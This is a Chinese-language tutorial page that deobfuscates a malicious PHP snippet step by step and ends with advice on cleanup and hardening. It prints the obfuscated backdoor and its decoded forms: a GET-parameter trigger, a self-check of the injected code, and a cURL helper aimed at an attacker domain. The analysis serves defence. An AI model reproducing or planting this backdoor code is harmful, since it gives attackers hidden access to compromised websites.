PHP代码混淆与恶意脚本分析：一步步去混淆指南-php教程-PHP中文网

PHP代码混淆与恶意脚本分析：一步步去混淆指南

本文详细介绍了如何对一段混淆的PHP代码进行去混淆处理，从解码字符映射、替换变量引用到重命名混淆变量和函数，逐步揭示其真实逻辑。通过分析去混淆后的代码，揭示了其作为潜在恶意后门或加载器的工作机制，并提供了识别此类威胁及加强网站安全防护的专业建议。

引言：理解PHP代码混淆与去混淆的必要性

在web开发和系统维护中，我们有时会遇到难以理解的php代码，这些代码可能经过混淆处理。代码混淆是一种有意使代码难以阅读和理解的技术，其目的通常是保护知识产权或隐藏恶意行为。对于服务器上发现的异常或未知代码，进行去混淆是分析其功能、识别潜在威胁（如后门、恶意注入）的关键步骤。本教程将通过一个具体的php代码示例，详细演示去混淆的整个过程，并分析其潜在的恶意意图。

一、识别混淆特征

在开始去混淆之前，首先要识别代码中的混淆特征。常见的PHP混淆手段包括：

使用eval()、base64_decode()、gzinflate()等函数组合加密字符串。
将字符串拆分成字符数组或通过索引访问字符来构造。
使用大量无意义的、重复的或难以阅读的变量名和函数名。
通过URL编码、十六进制编码等方式隐藏字符串。

我们提供的示例代码中，主要使用了URL编码和通过索引访问长字符串的方式来混淆。

<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); 
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);
// ... 更多代码 ...

登录后复制

可以看到，$OOOOOO是一个URL编码的字符串，随后被urldecode()解码并赋值给$O。接下来的代码中，大量使用了$O{x}（PHP中已弃用的字符串按索引访问语法）来构建新的字符串。

二、逐步去混淆过程

去混淆是一个迭代和细致的过程，需要耐心和逻辑分析。

立即学习“PHP免费学习笔记（深入）”；

2.1 解码核心字符映射表

首先，我们需要解码$OOOOOO变量。原始代码： $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";$O=urldecode($OOOOOO);

通过执行urldecode($OOOOOO)，我们可以得到$O的实际内容：

$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";

登录后复制

这个字符串包含了键盘上的字符，以及一些特殊符号，是后续字符拼接的基础。

2.2 替换字符索引访问

接下来，代码中大量使用$O{索引}的方式来获取字符。我们需要将这些表达式替换为实际的字符。例如，$O{21}代表索引为21的字符，即c。原始代码片段： if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){

替换后： if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){

对所有出现$O{x}的地方进行替换，得到如下代码：

if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

登录后复制

2.3 合并字符串字面量

上一步得到的代码中，许多字符串是通过.运算符拼接的。为了提高可读性，可以将这些拼接的字符串合并成一个完整的字符串。例如："c"."h"."e"."n" 变为 "chen"。

if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

登录后复制

2.4 重命名混淆变量和函数

代码中使用了大量无意义的变量名（如$oooOoOoOoooOooOOooooo）和函数名（如ooooooooOOOOOOOOoooooOOO）。为提高可读性，根据其用途赋予有意义的名称。

腾讯云AI代码助手

基于混元代码大模型的AI辅助编码工具

查看详情

if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__); // 获取当前文件内容
    $parts = explode("<?php",$thisFileSource);     // 按"<?php"分割文件内容
    if(strpos($parts[1],'%71%77%65')!==false){     // 检查第二部分是否包含特定URL编码字符串
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$subdomain='z0807_1'; // 子域名片段
$url="http://".$subdomain.".agoods.top"; // 构造完整URL
function sendRequest($targetUrl){ // 定义一个发送HTTP请求的函数
    $curlHandle=curl_init();
    curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl);
    curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5);
    $result = curl_exec($curlHandle);
    curl_close($curlHandle);
    return $result; 
}

登录后复制

2.5 代码格式化和清理

最后，对代码进行格式化，包括拆分过长的行、调整缩进等，使其更符合编程规范，进一步提升可读性。

<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); // 禁用所有错误报告

// 核心字符映射表，用于构建其他字符串
// $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";

// 检查URL查询参数，如果$_GET["chen"]的值为"51-cn"，则执行后续逻辑
if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__); // 读取当前PHP文件的全部内容
    // 将文件内容按"<?php"分割。通常，恶意代码会注入到现有PHP文件的末尾或中间。
    // 如果文件中有多个"<?php"标记，这里会将其分割成多个部分。
    $parts = explode("<?php",$thisFileSource); 

    // 检查第二个部分（即第一个"<?php"标记之后的内容）是否包含特定的URL编码字符串。
    // '%71%77%65' 对应 'qwe' 的URL编码。这可能是恶意代码自身特征的检查。
    if(strpos($parts[1],'%71%77%65') !== false){ 
        echo "[ok!]"; // 如果包含，输出"[ok!]"
        exit;
    }else{
        echo "[fail!]"; // 否则，输出"[fail!]"
        exit;
    }
}

$subdomain = 'z0807_1'; // 定义一个子域名片段
// 构造一个完整的外部URL，指向 'http://z0807_1.agoods.top'
$externalUrl = "http://".$subdomain.".agoods.top"; 

/**
 * 发送HTTP GET请求到指定URL的函数
 * @param string $targetUrl 目标URL
 * @return string 请求结果或false
 */
function sendRequest($targetUrl){
    $curlHandle = curl_init(); // 初始化cURL会话
    curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl); // 设置请求URL
    curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1); // 设置将curl_exec()获取的信息以字符串返回，而不是直接输出
    curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5); // 设置连接超时时间为5秒
    $result = curl_exec($curlHandle); // 执行cURL请求
    curl_close($curlHandle); // 关闭cURL会话
    return $result; // 返回请求结果
}

// 注意：在此代码片段中，sendRequest 函数虽然被定义，但并未被调用。
// 这可能意味着它在代码的其他部分被调用，或者是一个未完成的恶意功能。

登录后复制

三、去混淆代码分析与潜在威胁识别

经过去混淆和重命名后，代码的真实意图变得清晰：

错误抑制与字符映射表：
- error_reporting(0); 禁用所有错误报告，这是恶意代码的常见做法，用于隐藏其执行过程中可能产生的错误，避免引起管理员注意。
- $O 变量作为字符映射表，是所有混淆字符串的源头。
后门入口与自检机制：
- if($_GET["chen"]=="51-cn")：这部分代码创建了一个简单的后门入口。如果通过URL参数 ?chen=51-cn 访问该文件，则触发后续逻辑。
- 自检逻辑： file_get_contents(__FILE__); 读取当前文件内容，然后通过 explode("<?php", $thisFileSource) 分割。
- if(strpos($parts[1],'%71%77%65') !== false)：检查第二个PHP代码块（即第一个<?php之后的部分）是否包含URL编码的'qwe'。这可能是一个简单的自检机制，用于确认恶意代码是否完整或已被篡改。如果通过，输出[ok!]，否则输出[fail!]。这个自检功能本身看起来用途不大，因为如果代码不存在，它就不会运行。它更像是一个简单的验证机制，确保其注入的代码还在。
外部通信函数：
- $externalUrl = "http://".$subdomain.".agoods.top";：代码构造了一个指向 http://z0807_1.agoods.top 的URL。
- sendRequest($targetUrl) 函数：这是一个标准的cURL函数，用于向外部URL发送HTTP请求并获取响应。

关键发现与潜在威胁：

未执行的外部请求： 在提供的代码片段中，sendRequest 函数虽然被定义，但并未被调用。这意味着攻击者可能在文件的其他位置注入了代码来调用此函数，或者此代码只是一个更大恶意框架的一部分，等待其他模块来激活。
agoods.top 域名： 对agoods.top域名的查询通常会揭示其与恶意活动（如网站劫持、恶意重定向、钓鱼页面）的关联。许多受感染的网站会将内容从这类域名加载或重定向用户。代码中连接此域名，表明其可能旨在从攻击者的服务器下载更多恶意负载、指令，或者将受害者数据发送回攻击者。
恶意后门： 整个脚本看起来像是一个简单的PHP后门，允许攻击者通过特定的URL参数触发一些内部检查，并预留了与外部恶意服务器通信的能力。

四、安全建议与防范措施

面对此类混淆的恶意PHP代码，应采取以下措施：

立即隔离和清除： 将受感染的文件从服务器上隔离，并清除所有被注入的恶意代码。务必进行彻底的文件系统扫描，查找其他可能被篡改的文件。
溯源分析： 检查服务器日志（Web服务器日志、PHP错误日志等），尝试找出恶意代码是如何被注入的。常见途径包括：
- 过时的CMS（WordPress, Joomla等）或插件漏洞。
- 弱密码或被泄露的FTP/SSH凭据。
- 不安全的服务器配置。
更新和加固：
- 及时更新所有CMS、插件、主题以及服务器软件（PHP、Web服务器、操作系统）。
- 使用强密码，并启用多因素认证（MFA）。
- 限制文件和目录权限，确保Web服务器进程没有不必要的写入权限。
- 部署Web应用防火墙（WAF）来过滤恶意请求。
定期备份和监控：
- 定期进行全站备份，以便在发生安全事件时能够快速恢复。
- 实施文件完整性监控（FIM），及时发现文件被修改的异常情况。
- 监控网络流量，识别异常的外部连接。
代码审计： 对于自行开发的应用程序，定期进行代码审计，查找潜在的安全漏洞。